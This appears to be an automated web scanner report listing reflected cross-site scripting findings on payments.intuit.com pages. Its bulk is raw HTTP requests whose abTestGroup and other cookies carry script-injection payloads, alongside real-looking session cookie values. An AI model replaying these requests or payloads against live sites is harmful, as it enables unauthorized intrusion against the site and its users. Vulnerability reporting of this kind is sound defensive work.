GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bd521"><script>alert(1)</script>a06b40a6939;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8b6"><script>alert(1)</script>db141cf2372 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16be8b6"><script>alert(1)</script>db141cf2372;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ccada<script>alert(1)</script>03b0d3d035e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ccada<script>alert(1)</script>03b0d3d035e;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cec2"><script>alert(1)</script>271f29d1570 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T162cec2"><script>alert(1)</script>271f29d1570;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 3073f<script>alert(1)</script>daf5c68037 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T163073f<script>alert(1)</script>daf5c68037;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload a853f<script>alert(1)</script>6d2e750d194 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16a853f<script>alert(1)</script>6d2e750d194;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda72"><script>alert(1)</script>0bd96e557df was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bda72"><script>alert(1)</script>0bd96e557df;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 49004<script>alert(1)</script>a5a17e50b33 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1649004<script>alert(1)</script>a5a17e50b33;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2219"><script>alert(1)</script>d85e888e13e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d2219"><script>alert(1)</script>d85e888e13e;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c79ad"><script>alert(1)</script>e8785a94aac was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16c79ad"><script>alert(1)</script>e8785a94aac;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 77a3a<script>alert(1)</script>eb661626a4c was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1677a3a<script>alert(1)</script>eb661626a4c;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload b0496<script>alert(1)</script>bc940e2dae4 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16b0496<script>alert(1)</script>bc940e2dae4;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb67a"><script>alert(1)</script>411f1d9182d was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bb67a"><script>alert(1)</script>411f1d9182d;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?launchHelpMeChoose=true HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
